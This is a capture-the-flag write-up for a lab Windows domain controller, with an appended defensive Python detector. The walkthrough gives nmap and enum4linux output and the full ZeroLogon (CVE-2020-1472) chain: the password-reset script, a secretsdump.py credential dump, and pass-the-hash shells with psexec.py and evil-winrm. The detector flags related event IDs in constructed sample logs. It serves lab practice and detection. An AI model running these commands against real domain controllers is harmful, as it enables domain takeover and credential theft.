Cyber seclab - Zero (Windows)

Active Directory Practice

Nmap Scan Result

Nmap scan report for 172.31.1.29
Host is up (0.044s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-18 22:38:46Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: Zero.csl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: Zero.csl0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Zero-DC.Zero.csl
| Not valid before: 2022-01-17T22:36:34
|_Not valid after:  2022-07-19T22:36:34
| rdp-ntlm-info: 
|   Target_Name: ZERO
|   NetBIOS_Domain_Name: ZERO
|   NetBIOS_Computer_Name: ZERO-DC
|   DNS_Domain_Name: Zero.csl
|   DNS_Computer_Name: Zero-DC.Zero.csl
|   Product_Version: 10.0.17763
|_  System_Time: 2022-01-18T22:38:49+00:00
|_ssl-date: 2022-01-18T22:39:32+00:00; 0s from scanner time.
Service Info: Host: ZERO-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: ZERO-DC, NetBIOS user: <unknown>, NetBIOS MAC: 0a:c6:ce:4b:0d:48 (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-01-18T22:38:49
|_  start_date: N/A

Ports 139 and 445 are open, so we can run enum4linux -a against the host to enumerate the domain.

Domain Name: ZERO
Domain Sid: S-1-5-21-3994543222-2496524451-3410345432

The exploit for this box, dubbed “ZeroLogon” (CVE-2020-1472), allows us to take over the Domain Controller almost instantly by resetting the DC's machine account password to an empty string.

The latest version of Impacket and the Python script found here are needed.

Exploitation Steps:

  1. Download the Python script and make it executable (chmod +x).

  2. Execute the script: python3 cve-2020-1472.py Zero-DC 172.31.1.29

  • This resets the DC machine account password to an empty string, which lets us bypass authentication and dump the administrator hashes.

  3. Dump the admin hashes without providing a password:

  secretsdump.py -no-pass -just-dc zero/'Zero-DC$'@172.31.1.29

  4. With the admin hashes in hand, use psexec.py to get the root shell:

  • psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:36242e2cb0b26d16fafd267f39ccf990 Administrator@172.31.1.29

Option 2:

I was also able to get a shell with evil-winrm.

./evil-winrm/evil-winrm.rb -i 172.31.1.29 -u Administrator -H 36242e2cb0b26d16fafd267f39ccf990

psexec.py takes both parts of the hash (LM:NT), whereas evil-winrm takes only the second, NT part.

This room assumed that we already knew about the ZeroLogon vulnerability.
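As an added defensive counterpart to the steps above (not part of the original write-up), the Python snippet below shows what a blue team would look for on the Domain Controller after an attack like this: Security Event ID 4742 ("A computer account was changed") where the subject is ANONYMOUS LOGON and the target is a machine account, which is the footprint of the unauthenticated Netlogon password reset, plus the System-log Event IDs 5827/5828 (vulnerable Netlogon secure channel denied) and 5829 (vulnerable connection still allowed) that patched DCs emit. The log records are constructed in a flat key=value form for this example; real EVTX/XML records would have to be flattened to that shape first, and the field names used for the 5829 record are assumptions, not Microsoft's.

```python
"""
Added example (not from the original write-up): detect ZeroLogon
(CVE-2020-1472) indicators in flattened Domain Controller event logs.

Assumed record format (our own, constructed for this example):
    <timestamp> <Channel> EventID=<n> key=value key="value with spaces" ...
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# key=value pairs; quoted values may contain spaces (e.g. "ANONYMOUS LOGON")
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

EVT_COMPUTER_ACCOUNT_CHANGED = 4742     # Security log
EVT_NETLOGON_DENIED = {5827, 5828}      # System log: patched DC refused a vulnerable connection
EVT_NETLOGON_VULNERABLE_ALLOWED = 5829  # System log: vulnerable connection was still allowed


@dataclass
class Finding:
    timestamp: str
    event_id: int
    severity: str
    reason: str


def parse_record(line: str) -> Tuple[str, str, Dict[str, str]]:
    """Split one flat record into (timestamp, channel, fields)."""
    parts = line.split(" ", 2)
    if len(parts) < 3:
        return (parts[0] if parts else ""), "", {}
    timestamp, channel, rest = parts
    fields = {}
    for key, quoted, bare in KV_RE.findall(rest):
        fields[key] = quoted if quoted else bare
    return timestamp, channel, fields


def analyse(line: str) -> Optional[Finding]:
    """Return a Finding if the record matches a ZeroLogon indicator."""
    ts, _channel, f = parse_record(line)
    try:
        eid = int(f.get("EventID", "0"))
    except ValueError:
        return None

    if eid == EVT_COMPUTER_ACCOUNT_CHANGED:
        # SubjectUserName / TargetUserName are the real EventData field names of 4742.
        subject = f.get("SubjectUserName", "")
        target = f.get("TargetUserName", "")
        if subject.upper() == "ANONYMOUS LOGON" and target.endswith("$"):
            return Finding(ts, eid, "high",
                           f"machine account {target} changed by ANONYMOUS LOGON "
                           "(unauthenticated Netlogon password reset pattern)")
        # A 4742 whose subject is the machine itself is the normal 30-day rotation.
        return None

    # Field name 'SamAccountName' below is an assumption for this flat format.
    if eid in EVT_NETLOGON_DENIED:
        return Finding(ts, eid, "medium",
                       f"DC denied a vulnerable Netlogon secure channel from "
                       f"{f.get('SamAccountName', '?')}")
    if eid == EVT_NETLOGON_VULNERABLE_ALLOWED:
        return Finding(ts, eid, "medium",
                       f"vulnerable Netlogon secure channel still allowed from "
                       f"{f.get('SamAccountName', '?')}: enforcement mode is off")
    return None


def scan(log_text: str) -> List[Finding]:
    """Run analyse() over every non-empty line and collect the findings."""
    findings = []
    for line in log_text.strip().splitlines():
        finding = analyse(line)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample log: one ZeroLogon-style 4742, a benign logon, the DC's own
# routine password rotation, and a (constructed) non-Windows device on a
# vulnerable channel.
SAMPLE_LOG = """\
2022-01-18T22:41:02Z Security EventID=4742 Computer=Zero-DC.Zero.csl SubjectUserName="ANONYMOUS LOGON" SubjectDomainName="NT AUTHORITY" TargetUserName=ZERO-DC$ TargetDomainName=ZERO
2022-01-18T22:41:03Z Security EventID=4624 Computer=Zero-DC.Zero.csl TargetUserName=Administrator LogonType=3
2022-01-17T22:40:11Z Security EventID=4742 Computer=Zero-DC.Zero.csl SubjectUserName=ZERO-DC$ SubjectDomainName=ZERO TargetUserName=ZERO-DC$ TargetDomainName=ZERO
2022-01-18T22:41:01Z System EventID=5829 Computer=Zero-DC.Zero.csl SamAccountName=NASBOX01$ DomainName=ZERO
"""

if __name__ == "__main__":
    for fnd in scan(SAMPLE_LOG):
        print(f"[{fnd.severity.upper()}] {fnd.timestamp} EventID {fnd.event_id}: {fnd.reason}")
```

The 4742 rule deliberately ignores the DC's own scheduled password rotation (subject equals target) so it does not page on routine activity; the 5829 finding is worth acting on even without an attack, since it means the DC is still accepting vulnerable Netlogon connections and enforcement mode has not been turned on.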
